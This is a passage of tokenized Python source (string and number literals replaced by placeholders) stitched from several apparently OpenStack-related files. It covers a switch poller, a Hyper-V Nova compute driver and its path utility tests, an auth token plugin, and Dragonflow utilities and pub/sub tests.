vlan ] <EOL> else : <EOL> vlans = [ ] <EOL> if mac not in machine_dicts : <EOL> machine_dicts [ mac ] = { '<STR_LIT>' : mac , '<STR_LIT:port>' : port , '<STR_LIT>' : vlans } <EOL> else : <EOL> machine_dicts [ mac ] [ '<STR_LIT:port>' ] = port <EOL> machine_dicts [ mac ] [ '<STR_LIT>' ] . extend ( vlans ) <EOL> logging . debug ( '<STR_LIT>' , ip_addr ) <EOL> state = under_monitoring <EOL> return ( <EOL> { '<STR_LIT>' : vendor , '<STR_LIT:state>' : state , '<STR_LIT>' : err_msg } , <EOL> machine_dicts . values ( ) <EOL> ) <EOL> def poll_switch ( poller_email , ip_addr , credentials , <EOL> req_obj = '<STR_LIT>' , oper = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> poller = user_api . get_user_object ( poller_email ) <EOL> ip_int = long ( netaddr . IPAddress ( ip_addr ) ) <EOL> with util . lock ( '<STR_LIT>' % ip_addr , timeout = <NUM_LIT> ) as lock : <EOL> if not lock : <EOL> raise Exception ( <EOL> '<STR_LIT>' % ip_addr <EOL> ) <EOL> logging . debug ( '<STR_LIT>' , ip_addr ) <EOL> switch_dict , machine_dicts = _poll_switch ( <EOL> ip_addr , credentials , req_obj = req_obj , oper = oper <EOL> ) <EOL> switches = switch_api . list_switches ( ip_int = ip_int , user = poller ) <EOL> if not switches : <EOL> logging . error ( '<STR_LIT>' , ip_addr ) <EOL> return <EOL> for switch in switches : <EOL> for machine_dict in machine_dicts : <EOL> logging . debug ( '<STR_LIT>' , machine_dict ) <EOL> switch_api . add_switch_machine ( <EOL> switch [ '<STR_LIT:id>' ] , False , user = poller , ** machine_dict <EOL> ) <EOL> switch_api . update_switch ( <EOL> switch [ '<STR_LIT:id>' ] , <EOL> user = poller , <EOL> ** switch_dict <EOL> ) </s>
<s> def validate_cluster_config ( ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> from compass . hdsdiscovery import base <EOL> CLASS_NAME = '<STR_LIT>' <EOL> class Pica8 ( base . BaseSnmpVendor ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> base . BaseSnmpVendor . __init__ ( self , [ '<STR_LIT>' ] ) <EOL> self . _name = '<STR_LIT>' <EOL> @ property <EOL> def name ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _name </s>
<s> __author__ = "<STR_LIT>" <EOL> """<STR_LIT>""" <EOL> from mock import Mock <EOL> import os <EOL> import unittest2 <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT:true>' <EOL> from compass . utils import setting_wrapper as setting <EOL> from copy import deepcopy <EOL> reload ( setting ) <EOL> from compass . deployment . deploy_manager import DeployManager <EOL> from compass . tests . deployment . test_data import config_data <EOL> from compass . utils import flags <EOL> from compass . utils import logsetting <EOL> class TestDeployManager ( unittest2 . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( TestDeployManager , self ) . setUp ( ) <EOL> def tearDown ( self ) : <EOL> super ( TestDeployManager , self ) . tearDown ( ) <EOL> def test_init_DeployManager ( self ) : <EOL> adapter_info = deepcopy ( config_data . adapter_test_config ) <EOL> cluster_info = deepcopy ( config_data . cluster_test_config ) <EOL> hosts_info = deepcopy ( config_data . hosts_test_config ) <EOL> DeployManager . _get_installer = Mock ( ) <EOL> DeployManager . _get_installer . return_value = "<STR_LIT>" <EOL> test_manager = DeployManager ( adapter_info , cluster_info , hosts_info ) <EOL> self . assertIsNotNone ( test_manager ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> flags . init ( ) <EOL> logsetting . init ( ) <EOL> unittest2 . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import functools <EOL> import platform <EOL> import sys <EOL> from nova import exception <EOL> from nova import image <EOL> from nova . virt import driver <EOL> from os_win import exceptions as os_win_exc <EOL> from os_win import utilsfactory <EOL> from oslo_log import log as logging <EOL> from oslo_utils import excutils <EOL> import six <EOL> from hyperv . i18n import _ , _LE <EOL> from hyperv . nova import eventhandler <EOL> from hyperv . nova import hostops <EOL> from hyperv . nova import imagecache <EOL> from hyperv . nova import livemigrationops <EOL> from hyperv . nova import migrationops <EOL> from hyperv . nova import rdpconsoleops <EOL> from hyperv . nova import serialconsoleops <EOL> from hyperv . nova import snapshotops <EOL> from hyperv . nova import vmops <EOL> from hyperv . nova import volumeops <EOL> LOG = logging . getLogger ( __name__ ) <EOL> def convert_exceptions ( function , exception_map ) : <EOL> expected_exceptions = tuple ( exception_map . keys ( ) ) <EOL> @ functools . wraps ( function ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> try : <EOL> return function ( * args , ** kwargs ) <EOL> except expected_exceptions as ex : <EOL> raised_exception = exception_map . get ( type ( ex ) ) <EOL> if not raised_exception : <EOL> for expected in expected_exceptions : <EOL> if isinstance ( ex , expected ) : <EOL> raised_exception = exception_map [ expected ] <EOL> break <EOL> exc_info = sys . exc_info ( ) <EOL> exc = raised_exception ( six . text_type ( exc_info [ <NUM_LIT:1> ] ) ) <EOL> six . reraise ( raised_exception , exc , exc_info [ <NUM_LIT:2> ] ) <EOL> return wrapper <EOL> def decorate_all_methods ( decorator , * args , ** kwargs ) : <EOL> def decorate ( cls ) : <EOL> for attr in cls . __dict__ : <EOL> class_member = getattr ( cls , attr ) <EOL> if callable ( class_member ) : <EOL> setattr ( cls , attr , decorator ( class_member , * args , ** kwargs ) ) <EOL> return cls <EOL> return decorate <EOL> exception_conversion_map = { <EOL> os_win_exc . OSWinException : exception . NovaException , <EOL> os_win_exc . HyperVVMNotFoundException : exception . InstanceNotFound , <EOL> } <EOL> @ decorate_all_methods ( convert_exceptions , exception_conversion_map ) <EOL> class HyperVDriver ( driver . ComputeDriver ) : <EOL> capabilities = { <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : True <EOL> } <EOL> def __init__ ( self , virtapi ) : <EOL> self . _check_minimum_windows_version ( ) <EOL> super ( HyperVDriver , self ) . __init__ ( virtapi ) <EOL> self . _hostops = hostops . HostOps ( ) <EOL> self . _volumeops = volumeops . VolumeOps ( ) <EOL> self . _vmops = vmops . VMOps ( virtapi ) <EOL> self . _snapshotops = snapshotops . SnapshotOps ( ) <EOL> self . _livemigrationops = livemigrationops . LiveMigrationOps ( ) <EOL> self . _migrationops = migrationops . MigrationOps ( ) <EOL> self . _rdpconsoleops = rdpconsoleops . RDPConsoleOps ( ) <EOL> self . _serialconsoleops = serialconsoleops . SerialConsoleOps ( ) <EOL> self . _imagecache = imagecache . ImageCache ( ) <EOL> self . _image_api = image . API ( ) <EOL> def _check_minimum_windows_version ( self ) : <EOL> if not utilsfactory . get_hostutils ( ) . check_min_windows_version ( <NUM_LIT:6> , <NUM_LIT:2> ) : <EOL> LOG . error ( _LE ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> raise exception . HypervisorTooOld ( version = '<STR_LIT>' ) <EOL> @ property <EOL> def need_legacy_block_device_info ( self ) : <EOL> return False <EOL> def init_host ( self , host ) : <EOL> self . _serialconsoleops . start_console_handlers ( ) <EOL> event_handler = eventhandler . InstanceEventHandler ( <EOL> state_change_callback = self . emit_event ) <EOL> event_handler . start_listener ( ) <EOL> def list_instance_uuids ( self ) : <EOL> return self . _vmops . list_instance_uuids ( ) <EOL> def list_instances ( self ) : <EOL> return self . _vmops . list_instances ( ) <EOL> def spawn ( self , context , instance , image_meta , injected_files , <EOL> admin_password , network_info = None , block_device_info = None ) : <EOL> image_meta = self . _recreate_image_meta ( context , instance , image_meta ) <EOL> self . _vmops . spawn ( context , instance , image_meta , injected_files , <EOL> admin_password , network_info , block_device_info ) <EOL> def reboot ( self , context , instance , network_info , reboot_type , <EOL> block_device_info = None , bad_volumes_callback = None ) : <EOL> self . _vmops . reboot ( instance , network_info , reboot_type ) <EOL> def destroy ( self , context , instance , network_info , block_device_info = None , <EOL> destroy_disks = True , migrate_data = None ) : <EOL> self . _vmops . destroy ( instance , network_info , block_device_info , <EOL> destroy_disks ) <EOL> def cleanup ( self , context , instance , network_info , block_device_info = None , <EOL> destroy_disks = True , migrate_data = None , destroy_vifs = True ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def get_info ( self , instance ) : <EOL> return self . _vmops . get_info ( instance ) <EOL> def attach_volume ( self , context , connection_info , instance , mountpoint , <EOL> disk_bus = None , device_type = None , encryption = None ) : <EOL> return self . _volumeops . attach_volume ( connection_info , <EOL> instance . name ) <EOL> def detach_volume ( self , connection_info , instance , mountpoint , <EOL> encryption = None ) : <EOL> return self . _volumeops . detach_volume ( connection_info , <EOL> instance . name ) <EOL> def get_volume_connector ( self , instance ) : <EOL> return self . _volumeops . get_volume_connector ( ) <EOL> def get_available_resource ( self , nodename ) : <EOL> return self . _hostops . get_available_resource ( ) <EOL> def get_available_nodes ( self , refresh = False ) : <EOL> return [ platform . node ( ) ] <EOL> def host_power_action ( self , action ) : <EOL> return self . _hostops . host_power_action ( action ) <EOL> def snapshot ( self , context , instance , image_id , update_task_state ) : <EOL> self . _snapshotops . snapshot ( context , instance , image_id , <EOL> update_task_state ) <EOL> def pause ( self , instance ) : <EOL> self . _vmops . pause ( instance ) <EOL> def unpause ( self , instance ) : <EOL> self . _vmops . unpause ( instance ) <EOL> def suspend ( self , context , instance ) : <EOL> self . _vmops . suspend ( instance ) <EOL> def resume ( self , context , instance , network_info , block_device_info = None ) : <EOL> self . _vmops . resume ( instance ) <EOL> def power_off ( self , instance , timeout = <NUM_LIT:0> , retry_interval = <NUM_LIT:0> ) : <EOL> self . _vmops . power_off ( instance , timeout , retry_interval ) <EOL> def power_on ( self , context , instance , network_info , <EOL> block_device_info = None ) : <EOL> self . _vmops . power_on ( instance , block_device_info , network_info ) <EOL> def resume_state_on_host_boot ( self , context , instance , network_info , <EOL> block_device_info = None ) : <EOL> """<STR_LIT>""" <EOL> self . _vmops . resume_state_on_host_boot ( context , instance , network_info , <EOL> block_device_info ) <EOL> def live_migration ( self , context , instance , dest , post_method , <EOL> recover_method , block_migration = False , <EOL> migrate_data = None ) : <EOL> self . _livemigrationops . live_migration ( context , instance , dest , <EOL> post_method , recover_method , <EOL> block_migration , migrate_data ) <EOL> def rollback_live_migration_at_destination ( self , context , instance , <EOL> network_info , <EOL> block_device_info , <EOL> destroy_disks = True , <EOL> migrate_data = None ) : <EOL> self . destroy ( context , instance , network_info , block_device_info ) <EOL> def pre_live_migration ( self , context , instance , block_device_info , <EOL> network_info , disk_info , migrate_data = None ) : <EOL> self . _livemigrationops . pre_live_migration ( context , instance , <EOL> block_device_info , <EOL> network_info ) <EOL> def post_live_migration ( self , context , instance , block_device_info , <EOL> migrate_data = None ) : <EOL> self . _livemigrationops . post_live_migration ( context , instance , <EOL> block_device_info ) <EOL> def post_live_migration_at_source ( self , context , instance , network_info ) : <EOL> """<STR_LIT>""" <EOL> self . _vmops . unplug_vifs ( instance , network_info ) <EOL> def post_live_migration_at_destination ( self , context , instance , <EOL> network_info , <EOL> block_migration = False , <EOL> block_device_info = None ) : <EOL> self . _livemigrationops . post_live_migration_at_destination ( <EOL> context , <EOL> instance , <EOL> network_info , <EOL> block_migration ) <EOL> def check_can_live_migrate_destination ( self , context , instance , <EOL> src_compute_info , dst_compute_info , <EOL> block_migration = False , <EOL> disk_over_commit = False ) : <EOL> return self . _livemigrationops . check_can_live_migrate_destination ( <EOL> context , instance , src_compute_info , dst_compute_info , <EOL> block_migration , disk_over_commit ) <EOL> def check_can_live_migrate_destination_cleanup ( self , context , <EOL> dest_check_data ) : <EOL> self . _livemigrationops . check_can_live_migrate_destination_cleanup ( <EOL> context , dest_check_data ) <EOL> def check_can_live_migrate_source ( self , context , instance , <EOL> dest_check_data , block_device_info = None ) : <EOL> return self . _livemigrationops . check_can_live_migrate_source ( <EOL> context , instance , dest_check_data ) <EOL> def get_instance_disk_info ( self , instance , block_device_info = None ) : <EOL> pass <EOL> def plug_vifs ( self , instance , network_info ) : <EOL> """<STR_LIT>""" <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise NotImplementedError ( msg ) <EOL> def unplug_vifs ( self , instance , network_info ) : <EOL> """<STR_LIT>""" <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise NotImplementedError ( msg ) <EOL> def ensure_filtering_rules_for_instance ( self , instance , network_info ) : <EOL> LOG . debug ( "<STR_LIT>" , <EOL> instance = instance ) <EOL> def unfilter_instance ( self , instance , network_info ) : <EOL> LOG . debug ( "<STR_LIT>" , instance = instance ) <EOL> def migrate_disk_and_power_off ( self , context , instance , dest , <EOL> flavor , network_info , <EOL> block_device_info = None , <EOL> timeout = <NUM_LIT:0> , retry_interval = <NUM_LIT:0> ) : <EOL> return self . _migrationops . migrate_disk_and_power_off ( context , <EOL> instance , dest , <EOL> flavor , <EOL> network_info , <EOL> block_device_info , <EOL> timeout , <EOL> retry_interval ) <EOL> def confirm_migration ( self , migration , instance , network_info ) : <EOL> self . _migrationops . confirm_migration ( migration , instance , network_info ) <EOL> def finish_revert_migration ( self , context , instance , network_info , <EOL> block_device_info = None , power_on = True ) : <EOL> self . _migrationops . finish_revert_migration ( context , instance , <EOL> network_info , <EOL> block_device_info , power_on ) <EOL> def finish_migration ( self , context , migration , instance , disk_info , <EOL> network_info , image_meta , resize_instance , <EOL> block_device_info = None , power_on = True ) : <EOL> image_meta = self . _recreate_image_meta ( context , instance , image_meta ) <EOL> self . _migrationops . finish_migration ( context , migration , instance , <EOL> disk_info , network_info , <EOL> image_meta , resize_instance , <EOL> block_device_info , power_on ) <EOL> def get_host_ip_addr ( self ) : <EOL> return self . _hostops . get_host_ip_addr ( ) <EOL> def get_host_uptime ( self ) : <EOL> return self . _hostops . get_host_uptime ( ) <EOL> def get_rdp_console ( self , context , instance ) : <EOL> return self . _rdpconsoleops . get_rdp_console ( instance ) <EOL> def get_serial_console ( self , context , instance ) : <EOL> return self . _serialconsoleops . get_serial_console ( instance . name ) <EOL> def get_console_output ( self , context , instance ) : <EOL> return self . _serialconsoleops . get_console_output ( instance . name ) <EOL> def manage_image_cache ( self , context , all_instances ) : <EOL> self . _imagecache . update ( context , all_instances ) <EOL> def rescue ( self , context , instance , network_info , image_meta , <EOL> rescue_password ) : <EOL> image_meta = self . _recreate_image_meta ( context , instance , image_meta ) <EOL> try : <EOL> self . _vmops . rescue_instance ( context , instance , network_info , <EOL> image_meta , rescue_password ) <EOL> except Exception : <EOL> with excutils . save_and_reraise_exception ( ) : <EOL> self . _vmops . unrescue_instance ( instance ) <EOL> def unrescue ( self , instance , network_info ) : <EOL> self . _vmops . unrescue_instance ( instance ) <EOL> def attach_interface ( self , instance , image_meta , vif ) : <EOL> return self . _vmops . attach_interface ( instance , vif ) <EOL> def detach_interface ( self , instance , vif ) : <EOL> return self . _vmops . detach_interface ( instance , vif ) <EOL> def host_maintenance_mode ( self , host , mode ) : <EOL> return self . _hostops . host_maintenance_mode ( host , mode ) <EOL> def _recreate_image_meta ( self , context , instance , image_meta ) : <EOL> if image_meta . obj_attr_is_set ( "<STR_LIT:id>" ) : <EOL> image_ref = image_meta . id <EOL> else : <EOL> image_ref = instance . system_metadata [ '<STR_LIT>' ] <EOL> if image_ref : <EOL> image_meta = self . _image_api . get ( context , image_ref ) <EOL> else : <EOL> image_meta = image_meta . obj_to_primitive ( ) [ '<STR_LIT>' ] <EOL> image_meta [ '<STR_LIT>' ] = { k . replace ( '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:1> ) : v for k , v <EOL> in instance . system_metadata . items ( ) } <EOL> image_meta [ "<STR_LIT:id>" ] = image_ref <EOL> return image_meta </s>
<s> import os <EOL> import time <EOL> import mock <EOL> from nova import exception <EOL> from six . moves import builtins <EOL> from hyperv . nova import constants <EOL> from hyperv . nova import pathutils <EOL> from hyperv . tests . unit import test_base <EOL> class PathUtilsTestCase ( test_base . HyperVBaseTestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( PathUtilsTestCase , self ) . setUp ( ) <EOL> self . fake_instance_dir = os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . fake_instance_name = '<STR_LIT>' <EOL> self . _pathutils = pathutils . PathUtils ( ) <EOL> self . _pathutils . _smb_conn_attr = mock . MagicMock ( ) <EOL> def _mock_lookup_configdrive_path ( self , ext , rescue = False ) : <EOL> self . _pathutils . get_instance_dir = mock . MagicMock ( <EOL> return_value = self . fake_instance_dir ) <EOL> def mock_exists ( * args , ** kwargs ) : <EOL> path = args [ <NUM_LIT:0> ] <EOL> return True if path [ ( path . rfind ( '<STR_LIT:.>' ) + <NUM_LIT:1> ) : ] == ext else False <EOL> self . _pathutils . exists = mock_exists <EOL> configdrive_path = self . _pathutils . lookup_configdrive_path ( <EOL> self . fake_instance_name , rescue ) <EOL> return configdrive_path <EOL> def _test_lookup_configdrive_path ( self , rescue = False ) : <EOL> configdrive_name = '<STR_LIT>' <EOL> if rescue : <EOL> configdrive_name += '<STR_LIT>' <EOL> for format_ext in constants . DISK_FORMAT_MAP : <EOL> configdrive_path = self . _mock_lookup_configdrive_path ( format_ext , <EOL> rescue ) <EOL> expected_path = os . path . join ( self . fake_instance_dir , <EOL> configdrive_name + '<STR_LIT:.>' + format_ext ) <EOL> self . assertEqual ( expected_path , configdrive_path ) <EOL> def test_lookup_configdrive_path ( self ) : <EOL> self . _test_lookup_configdrive_path ( ) <EOL> def test_lookup_rescue_configdrive_path ( self ) : <EOL> self . _test_lookup_configdrive_path ( rescue = True ) <EOL> def test_lookup_configdrive_path_non_exist ( self ) : <EOL> self . _pathutils . get_instance_dir = mock . MagicMock ( <EOL> return_value = self . fake_instance_dir ) <EOL> self . _pathutils . exists = mock . MagicMock ( return_value = False ) <EOL> configdrive_path = self . _pathutils . lookup_configdrive_path ( <EOL> self . fake_instance_name ) <EOL> self . assertIsNone ( configdrive_path ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_get_instances_sub_dir ( self , fake_path_join ) : <EOL> class WindowsError ( Exception ) : <EOL> def __init__ ( self , winerror = None ) : <EOL> self . winerror = winerror <EOL> fake_dir_name = "<STR_LIT>" <EOL> fake_windows_error = WindowsError <EOL> self . _pathutils . check_create_dir = mock . MagicMock ( <EOL> side_effect = WindowsError ( pathutils . ERROR_INVALID_NAME ) ) <EOL> with mock . patch . object ( builtins , '<STR_LIT>' , <EOL> fake_windows_error , create = True ) : <EOL> self . assertRaises ( exception . AdminRequired , <EOL> self . _pathutils . _get_instances_sub_dir , <EOL> fake_dir_name ) <EOL> def test_copy_vm_console_logs ( self ) : <EOL> fake_local_logs = [ mock . sentinel . log_path , <EOL> mock . sentinel . archived_log_path ] <EOL> fake_remote_logs = [ mock . sentinel . remote_log_path , <EOL> mock . sentinel . remote_archived_log_path ] <EOL> self . _pathutils . exists = mock . Mock ( return_value = True ) <EOL> self . _pathutils . copy = mock . Mock ( ) <EOL> self . _pathutils . get_vm_console_log_paths = mock . Mock ( <EOL> side_effect = [ fake_local_logs , fake_remote_logs ] ) <EOL> self . _pathutils . copy_vm_console_logs ( mock . sentinel . instance_name , <EOL> mock . sentinel . dest_host ) <EOL> self . _pathutils . get_vm_console_log_paths . assert_has_calls ( <EOL> [ mock . call ( mock . sentinel . instance_name ) , <EOL> mock . call ( mock . sentinel . instance_name , <EOL> remote_server = mock . sentinel . dest_host ) ] ) <EOL> self . _pathutils . copy . assert_has_calls ( [ <EOL> mock . call ( mock . sentinel . log_path , <EOL> mock . sentinel . remote_log_path ) , <EOL> mock . call ( mock . sentinel . archived_log_path , <EOL> mock . sentinel . remote_archived_log_path ) ] ) <EOL> @ mock . patch . object ( pathutils . PathUtils , '<STR_LIT>' ) <EOL> @ mock . patch . object ( pathutils . PathUtils , '<STR_LIT>' ) <EOL> def _test_lookup_image_basepath ( self , mock_exists , <EOL> mock_get_base_vhd_dir , found = True ) : <EOL> fake_image_name = '<STR_LIT>' <EOL> if found : <EOL> mock_exists . side_effect = [ False , True ] <EOL> else : <EOL> mock_exists . return_value = False <EOL> mock_get_base_vhd_dir . return_value = '<STR_LIT>' <EOL> res = self . _pathutils . lookup_image_basepath ( fake_image_name ) <EOL> mock_get_base_vhd_dir . assert_called_once_with ( ) <EOL> if found : <EOL> self . assertEqual ( <EOL> res , os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> else : <EOL> self . assertIsNone ( res ) <EOL> def test_lookup_image_basepath ( self ) : <EOL> self . _test_lookup_image_basepath ( ) <EOL> def test_lookup_image_basepath_not_found ( self ) : <EOL> self . _test_lookup_image_basepath ( found = False ) <EOL> def test_get_age_of_file ( self ) : <EOL> current_time = time . time ( ) <EOL> self . _check_get_age_of_file ( current_time = current_time ) <EOL> @ mock . patch . object ( os . path , '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def _check_get_age_of_file ( self , mock_time , mock_getmtime , current_time ) : <EOL> mock_time . return_value = current_time <EOL> mock_getmtime . return_value = current_time - <NUM_LIT:5> <EOL> ret = self . _pathutils . get_age_of_file ( mock . sentinel . file_name ) <EOL> self . assertEqual ( <NUM_LIT:5> , ret ) <EOL> mock_getmtime . assert_called_once_with ( mock . sentinel . file_name ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_check_dirs_shared_storage ( self , mock_named_tempfile , <EOL> mock_exists ) : <EOL> fake_src_dir = '<STR_LIT>' <EOL> fake_dest_dir = '<STR_LIT>' <EOL> mock_exists . return_value = True <EOL> mock_tmpfile = mock_named_tempfile . return_value . __enter__ . return_value <EOL> mock_tmpfile . name = '<STR_LIT>' <EOL> expected_src_tmp_path = os . path . join ( fake_src_dir , <EOL> mock_tmpfile . name ) <EOL> self . _pathutils . check_dirs_shared_storage ( <EOL> fake_src_dir , fake_dest_dir ) <EOL> mock_named_tempfile . assert_called_once_with ( dir = fake_dest_dir ) <EOL> mock_exists . assert_called_once_with ( expected_src_tmp_path ) </s>
<s> from keystoneauth1 . identity import v2 as v2_auth <EOL> from keystoneauth1 . identity import v3 as v3_auth <EOL> from openstack_auth . plugin import base <EOL> from openstack_auth import utils <EOL> __all__ = [ '<STR_LIT>' ] <EOL> class TokenPlugin ( base . BasePlugin ) : <EOL> """<STR_LIT>""" <EOL> def get_plugin ( self , auth_url = None , token = None , project_id = None , <EOL> ** kwargs ) : <EOL> if not all ( ( auth_url , token ) ) : <EOL> return None <EOL> if utils . get_keystone_version ( ) >= <NUM_LIT:3> : <EOL> return v3_auth . Token ( auth_url = auth_url , <EOL> token = token , <EOL> project_id = project_id , <EOL> reauthenticate = False ) <EOL> else : <EOL> return v2_auth . Token ( auth_url = auth_url , <EOL> token = token , <EOL> tenant_id = project_id , <EOL> reauthenticate = False ) </s>
<s> from ryu . lib import addrconv <EOL> import struct <EOL> from dragonflow . controller . common import constants as const <EOL> UINT32_MAX = <NUM_LIT> <EOL> _aging_cookie = <NUM_LIT:0> <EOL> def ipv4_text_to_int ( ip_text ) : <EOL> if ip_text == <NUM_LIT:0> : <EOL> return ip_text <EOL> assert isinstance ( ip_text , str ) <EOL> return struct . unpack ( '<STR_LIT>' , addrconv . ipv4 . text_to_bin ( ip_text ) ) [ <NUM_LIT:0> ] <EOL> def mask_ntob ( mask , err_msg = None ) : <EOL> try : <EOL> return ( UINT32_MAX << ( <NUM_LIT:32> - mask ) ) & UINT32_MAX <EOL> except ValueError : <EOL> msg = '<STR_LIT>' <EOL> if err_msg is not None : <EOL> msg = '<STR_LIT>' % ( err_msg , msg ) <EOL> raise ValueError ( msg ) <EOL> def set_aging_cookie ( c ) : <EOL> global _aging_cookie <EOL> _aging_cookie = c <EOL> def get_aging_cookie ( ) : <EOL> return _aging_cookie <EOL> def set_aging_cookie_bits ( cookie ) : <EOL> c = cookie & ( ~ const . GLOBAL_AGING_COOKIE_MASK ) <EOL> c |= ( _aging_cookie & const . GLOBAL_AGING_COOKIE_MASK ) <EOL> return c <EOL> def get_xor_cookie ( cookie ) : <EOL> return cookie ^ const . GLOBAL_INIT_AGING_COOKIE </s>
<s> from dragonflow . db . drivers import ramcloud_db_driver <EOL> import getopt <EOL> import sys <EOL> def main ( argv ) : <EOL> db_ip = '<STR_LIT>' <EOL> db_port = '<STR_LIT>' <EOL> try : <EOL> opts , args = getopt . getopt ( sys . argv [ <NUM_LIT:1> : ] , <EOL> '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> except getopt . GetoptError : <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> for opt , arg in opts : <EOL> if opt == '<STR_LIT>' : <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> sys . exit ( ) <EOL> elif opt in "<STR_LIT>" : <EOL> db_table = arg . split ( '<STR_LIT:U+002C>' ) <EOL> elif opt in "<STR_LIT>" : <EOL> db_ip = arg <EOL> elif opt in "<STR_LIT>" : <EOL> db_port = arg <EOL> print ( '<STR_LIT>' , db_table ) <EOL> print ( '<STR_LIT>' , db_ip ) <EOL> print ( '<STR_LIT>' , db_port ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' + db_ip + '<STR_LIT::>' + db_port ) <EOL> print ( '<STR_LIT>' , db_table ) <EOL> client = ramcloud_db_driver . RamCloudDbDriver ( ) <EOL> client . initialize ( db_ip , db_port ) <EOL> client . create_tables ( db_table ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( sys . argv [ <NUM_LIT:1> : ] ) </s>
<s> import eventlet <EOL> import random <EOL> import six <EOL> from oslo_config import cfg <EOL> from oslo_serialization import jsonutils <EOL> from neutron . agent . linux . utils import wait_until_true <EOL> from dragonflow . common import utils as df_utils <EOL> from dragonflow . db . db_common import DbUpdate , SEND_ALL_TOPIC <EOL> from dragonflow . db . pub_sub_api import TableMonitor <EOL> from dragonflow . tests . common import utils as test_utils <EOL> from dragonflow . tests . fullstack import test_base <EOL> from dragonflow . tests . fullstack import test_objects as objects <EOL> events_num = <NUM_LIT:0> <EOL> def get_publisher ( ) : <EOL> pub_sub_driver = df_utils . load_driver ( <EOL> cfg . CONF . df . pub_sub_multiproc_driver , <EOL> df_utils . DF_PUBSUB_DRIVER_NAMESPACE ) <EOL> publisher = pub_sub_driver . get_publisher ( ) <EOL> publisher . initialize ( ) <EOL> return publisher <EOL> def get_subscriber ( callback ) : <EOL> pub_sub_driver = df_utils . load_driver ( <EOL> cfg . CONF . df . pub_sub_driver , <EOL> df_utils . DF_PUBSUB_DRIVER_NAMESPACE ) <EOL> subscriber = pub_sub_driver . get_subscriber ( ) <EOL> subscriber . initialize ( callback ) <EOL> uri = '<STR_LIT>' % ( <EOL> cfg . CONF . df . publisher_transport , <EOL> '<STR_LIT:127.0.0.1>' , <EOL> cfg . CONF . df . publisher_port <EOL> ) <EOL> subscriber . register_listen_address ( uri ) <EOL> subscriber . daemonize ( ) <EOL> return subscriber <EOL> class Namespace ( object ) : <EOL> pass <EOL> class TestPubSub ( test_base . DFTestBase ) : <EOL> def setUp ( self ) : <EOL> super ( TestPubSub , self ) . setUp ( ) <EOL> self . events_num = <NUM_LIT:0> <EOL> self . do_test = cfg . CONF . df . enable_df_pub_sub <EOL> self . key = '<STR_LIT>' . format ( random . random ( ) ) <EOL> def test_pub_sub_add_port ( self ) : <EOL> global events_num <EOL> local_event_num = <NUM_LIT:0> <EOL> if not self . do_test : <EOL> return <EOL> def _db_change_callback ( table , key , action , value , topic ) : <EOL> global events_num <EOL> events_num += <NUM_LIT:1> <EOL> subscriber = get_subscriber ( _db_change_callback ) <EOL> network = self . store ( objects . NetworkTestObj ( self . neutron , self . nb_api ) ) <EOL> network_id = network . create ( ) <EOL> eventlet . sleep ( test_utils . DEFAULT_CMD_TIMEOUT ) <EOL> self . assertNotEqual ( local_event_num , events_num ) <EOL> local_event_num = events_num <EOL> port = self . store ( objects . PortTestObj ( <EOL> self . neutron , <EOL> self . nb_api , <EOL> network_id <EOL> ) ) <EOL> port . create ( ) <EOL> eventlet . sleep ( test_utils . DEFAULT_CMD_TIMEOUT ) <EOL> self . assertNotEqual ( local_event_num , events_num ) <EOL> local_event_num = events_num <EOL> port . close ( ) <EOL> eventlet . sleep ( test_utils . DEFAULT_CMD_TIMEOUT ) <EOL> self . assertNotEqual ( local_event_num , events_num ) <EOL> local_event_num = events_num <EOL> network . close ( ) <EOL> eventlet . sleep ( test_utils . DEFAULT_CMD_TIMEOUT ) <EOL> self . assertNotEqual ( local_event_num , events_num ) <EOL> subscriber . stop ( ) <EOL> self . assertFalse ( network . exists ( ) ) <EOL> def test_pub_sub_update_port ( self ) : <EOL> ns = Namespace ( ) <EOL> ns . events_num = <NUM_LIT:0> <EOL> local_event_num = <NUM_LIT:0> <EOL> if not self . do_test : <EOL> return <EOL> def _db_change_callback ( table , key , action , value , topic ) : <EOL> ns . events_num += <NUM_LIT:1> <EOL> subscriber = get_subscriber ( _db_change_callback ) <EOL> network = self . store ( objects . NetworkTestObj ( self . neutron , self . nb_api ) ) <EOL> network_id = network . create ( ) <EOL> eventlet . sleep ( test_utils . DEFAULT_CMD_TIMEOUT ) <EOL> self . assertNotEqual ( local_event_num , ns . events_num ) <EOL> port = self . store ( objects . PortTestObj ( <EOL> self . neutron , <EOL> self . nb_api , <EOL> network_id <EOL> ) ) <EOL> local_event_num = ns . events_num <EOL> port_id = port . create ( ) <EOL> eventlet . sleep ( test_utils . DEFAULT_CMD_TIMEOUT ) <EOL> self . assertNotEqual ( local_event_num , ns . events_num 